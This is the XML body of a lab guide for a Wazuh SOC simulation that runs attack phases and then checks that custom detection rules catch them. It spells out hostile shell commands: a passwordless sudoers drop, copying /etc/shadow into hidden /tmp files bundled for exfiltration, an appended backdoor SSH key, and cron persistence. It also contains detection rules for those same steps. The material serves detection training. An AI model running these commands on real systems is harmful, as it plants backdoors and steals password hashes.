        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C152D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.3 Sudoers Drop — Privilege Escalation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2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 (as labuser)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C152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'svcmonitor ALL=(ALL) NOPASSWD:ALL' | sudo tee /etc/sudoers.d/svcmonitor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C153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chmod 440 /etc/sudoers.d/svcmonitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1532" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1533" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6.4 Stage /etc/shadow Copy in /tmp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3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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C153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cp /etc/shadow /tmp/.shadow_backup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C153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tar -czf /tmp/.exfil_bundle.tar.gz /tmp/.shadow_backup 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C153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ls -la /tmp/.shadow_backup /tmp/.exfil_bundle.tar.gz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1539" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C153A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6.5 Verify Detection in Wazuh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53B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53C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tail -f /var/ossec/logs/alerts/alerts.log | grep -E '10011[0-6]|shadow|passwd'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C153E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540" w14:textId="251DF366" w:rsidR="00E3256E" w:rsidRDefault="00067CA9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5A80912" wp14:editId="2E2D90EF">
                  <wp:extent cx="5943600" cy="2218055"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2633077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542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6.3 — Rule 100110-100116 firing: useradd, passwd, /etc/shadow FIM, sudoers FIM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1543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544" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B1F1F"/>
              </w:rPr>
              <w:t>Detection Chain — Phase 4 (all within 30 seconds)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1545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t>•  Rule 100110 (L12): auditd — useradd syscall captured (key: user_creation)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1546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t>•  Rule 100111 (L11): auditd — passwd command executed (key: passwd_change)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1547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t>•  Rule 100112 (L13): FIM — /etc/shadow modified, new hash written</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1548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t>•  Rule 100113 (L12): FIM — /etc/passwd modified, new account entry</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1549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lastRenderedPageBreak/>
              <w:t>•  Rule 100114 (L12): auditd — usermod executed (key: user_mod)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C154A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4A0E0E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  Rule 100116 (L14): FIM — /etc/sudoers drop detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C154C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C154D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7. Phase 5 — Persistence and Lateral Movement (T1098.004, T1053.003, T1074.001)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54E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0C447C"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1098.004 + T1053.003 + T1074.001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C154F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T1098.004: Backdoor SSH key planted in authorized_keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1550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T1053.003: Crontab persistence mechanism added</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1551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T1074.001: Data staged in /tmp for simulated exfiltration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1552" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="042C53"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  Detection: FIM realtime on /home, /var/spool/cron, /tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1554" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1555" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>7.1 Plant Backdoor SSH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5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 (as labuser)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C155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mkdir -p ~/.ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C155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cat ~/.ssh/lab_backdoor.pub &gt;&gt; ~/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1559" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C155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Verify the key was appended</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C155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tail -1 ~/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C155D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1562" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>7.2 Add Crontab Persistence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6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 (as labuser)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C156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(crontab -l 2&gt;/dev/null; echo '*/5 * * * * /tmp/.svc_update.sh') | crontab -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1565" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C156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Create the persistence script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C156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'#!/bin/bash' &gt; /tmp/.svc_update.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C156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chmod +x /tmp/.svc_update.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C156A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C156F" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>7.3 Verify All Persistence Detections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570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571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tail -f /var/ossec/logs/alerts/alerts.log | grep -E '100300|100301|100303'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1573" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1578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6" w:space="0" w:color="3585F9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C1579" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B5E20"/>
              </w:rPr>
              <w:t>Detection Confirmed — Phase 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C157A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100301 (L13): authorized_keys modified — backdoor SSH key</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C157B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100303 (L11): Crontab modified — persistence mechanism</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C157C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100300 (L9):  New file in /tmp — fired per staged file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C157D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0D3B12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  Rule 100115 (L14): Shadow file copy in /tmp — credential staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1580" w14:textId="0C90166D" w:rsidR="00E3256E" w:rsidRDefault="00174153" w:rsidP="00067CA9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3585F9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Custom Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1581" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ll rules go in one file on the Wazuh server. Create it before running any simulation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1582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583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Run on: WAZUH_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1584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nano /var/ossec/etc/rules/lab_custom_rules.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1586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587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>&lt;!-- ============================================================</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1588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Wazuh SOC Engineer Simulation Lab — Custom Rules</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C158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Platform: Wazuh 4.14.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C158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File: /var/ossec/etc/rules/lab_custom_rules.xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C158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Rule range: 100100-100399</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C158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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     ============================================================ --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C158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>&lt;group name="lab_attack,authentication,"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C158E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C158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 xml:space="preserve">  &lt;!-- T1110.001: SSH Brute Force --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1590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id="100100" level="12" frequency="8" timeframe="60"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1591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&lt;if_matched_sid&gt;5760&lt;/if_matched_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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&lt;same_source_ip /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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SSH brute force: 8+ failures from same source&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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&lt;mitre&gt;&lt;id&gt;T1110.001&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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&lt;group&gt;authentication_failures,gdpr_IV_32.2,pci_dss_10.2.4,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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97" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C1598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id="100101" level="14"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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&lt;if_sid&gt;5760&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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&lt;user&gt;root&lt;/user&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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SSH brute force targeting root account&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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&lt;mitre&gt;&lt;id&gt;T1110.001&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C159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9E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C159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 xml:space="preserve">  &lt;!-- T1136.001: User Account Creation --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A0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id="100110" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A1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&lt;if_sid&gt;80791&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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name="audit.key"&gt;user_creation&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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New local user account created via useradd/adduser&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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&lt;mitre&gt;&lt;id&gt;T1136.001&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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&lt;group&gt;account_creation,pci_dss_10.2.5,gdpr_IV_35.7.d,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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A7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15A8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id="100111" level="11"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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&lt;if_sid&gt;80791&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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name="audit.key"&gt;passwd_change&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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Password hash written — passwd command executed&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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&lt;mitre&gt;&lt;id&gt;T1136.001&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15A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&lt;group&gt;account_creation,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15AE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AF" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15B0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 xml:space="preserve">  &lt;!-- T1003.008: /etc/shadow Access --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B1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id="100112" level="13"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    &lt;if_sid&gt;550,554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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name="file"&gt;^/etc/shadow$&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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/etc/shadow modified — new password hash written&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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&lt;mitre&gt;&lt;id&gt;T1003.008&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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&lt;group&gt;account_creation,gdpr_IV_32.2,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B7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B8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15B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id="100113" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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&lt;if_sid&gt;550,554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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name="file"&gt;^/etc/passwd$&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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/etc/passwd modified — new account entry&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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&lt;mitre&gt;&lt;id&gt;T1136.001&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15BE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&lt;group&gt;account_creation,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15B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C0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15C1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id="100114" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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&lt;if_sid&gt;80791&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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name="audit.key"&gt;user_mod&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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User account modified — usermod executed&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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&lt;mitre&gt;&lt;id&gt;T1548.003&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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&lt;group&gt;account_creation,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C7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C8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15C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id="100115" level="14"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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&lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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name="file"&gt;shadow&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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name="file"&gt;^/tmp&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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Shadow file copy in /tmp — credential staging&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15CE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&lt;mitre&gt;&lt;id&gt;T1003.008&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15C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&lt;group&gt;credential_access,gdpr_IV_35.7.d,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D0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D1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15D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id="100116" level="14"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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&lt;if_sid&gt;550,554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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name="file"&gt;^/etc/sudoers&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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Sudoers modified — privilege escalation path&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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&lt;mitre&gt;&lt;id&gt;T1548.003&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D7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  &lt;group&gt;account_creation,gdpr_IV_32.2,&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D8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D9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15D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 xml:space="preserve">  &lt;!-- T1550.002: Pass-the-Hash --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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id="100200" level="10" frequency="5" timeframe="30"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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&lt;if_matched_sid&gt;5716&lt;/if_matched_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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&lt;same_source_ip /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15DE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SMB auth failure spike — credential spray&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15D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&lt;mitre&gt;&lt;id&gt;T1550.002&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E0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E1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15E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id="100201" level="8"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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&lt;decoded_as&gt;samba&lt;/decoded_as&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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&lt;match&gt;session setup failed&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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Samba NTLM auth rejected — PtH indicator&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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&lt;mitre&gt;&lt;id&gt;T1550.002&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E7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E8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15E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7EC8A0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!-- T1074.001, T1098.004, T1053.003: Persistence --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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id="100300" level="9"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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&lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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name="file"&gt;^/tmp&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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New file in /tmp — staging or dropper&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15EE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&lt;mitre&gt;&lt;id&gt;T1074.001&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15E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F0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15F1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id="100301" level="13"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15F2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&lt;if_sid&gt;550,554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15F3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name="file"&gt;authorized_keys$&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15F4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authorized_keys modified — backdoor SSH key planted&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15F5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&lt;mitre&gt;&lt;id&gt;T1098.004&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15F6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F7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15F8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&lt;rule id="100303" level="11"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15F9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&lt;if_sid&gt;550,554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15FA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&lt;field name="file"&gt;^/var/spool/cron&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15FB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&lt;description&gt;[LAB] Crontab modified — scheduled persistence added&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15FC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C0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;mitre&gt;&lt;id&gt;T1053.003&lt;/id&gt;&lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15FD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 xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C15FE" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="18" w:after="18"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C15FF" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153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9D5C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1601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60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Validate and reload rules on WAZUH_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C160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/var/ossec/bin/ossec-logtest -t 2&gt;&amp;1 | tail -5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C160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systemctl restart wazuh-manager</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C160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grep -E 'ERROR' /var/ossec/logs/ossec.log | tail -5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
